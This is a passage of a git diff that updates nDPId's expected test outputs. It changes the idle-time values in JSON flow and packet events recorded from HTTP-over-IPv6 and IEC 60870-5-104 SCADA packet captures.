-00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":193,"packets-processed":193,"total-skipped-flows":0,"total-l4-data-len":51193,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":7,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":98,"global_ts_msec":1448269146970} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 193/193 diff --git a/test/results/iec60780-5-104.pcap.out b/test/results/iec60780-5-104.pcap.out index 56f3cec68..f7133639f 100644 --- a/test/results/iec60780-5-104.pcap.out +++ b/test/results/iec60780-5-104.pcap.out @@ -1,42 +1,42 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"iec60780-5-104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1219992231267} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 